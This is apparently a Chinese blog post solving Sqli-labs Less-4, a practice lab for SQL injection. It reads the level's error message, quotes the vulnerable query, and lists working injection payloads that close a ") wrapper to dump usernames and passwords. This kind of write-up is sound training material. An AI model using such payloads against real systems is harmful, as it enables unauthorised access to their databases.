Sqli-labs less 4
2016-08-11 23:04
375 查看
Less-4
我们使用?id=1"注入代码后,我们得到像这样的一个错误:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"") LIMIT 0,1' at line 1
这里它意味着,代码当中对id参数进行了 "" 和 () 的包装。
所以我们再用这样的代码来进行注入:
?id=1") –-+
这样一来,我们便可以得到用户名和密码了,同时后面查询也已经被注释掉了。
在源代码中的SQL查询语句,31行:
$sql="SELECT * FROM users WHERE id=("$id") LIMIT 0,1";
可以成功注入的有:
") or "1"=("1
") or 1=1 --+
其余的payload与less1中一直,只需要将less1中的 ' 更换为 ") 。
相关文章推荐
- Sqli-labs less 55
- Sqli-labs less 39
- Sqli-labs less 3
- sqli-labs Less(1-35) 小结
- SQLi-LABS-Page-2-(Adv-Injections)less-23-38注入教程
- Sqli-labs less 54
- Sqli-labs less 2
- Sqli-labs less 38
- Sqli-labs less 26a
- 通过sqli-labs学习sql注入——进阶挑战之less23-28a
- SQLi-Labs 学习笔记(Less 51-65)
- Sqli-labs less 37
- Sqli-labs less 15
- 【SQL注入之sqli-labs】Less 1 - Less 5 练习笔记
- 【SQL注入之sqli-labs】Less 6 - Less 10 练习笔记
- SQLi-Labs 学习笔记(Less 31-40)
- SQLi-Labs 学习笔记(Less 1-10)
- Sqli-labs less 35
- Sqli-labs less 16
- SQLi-Labs 练习总结 Page-1 Less-1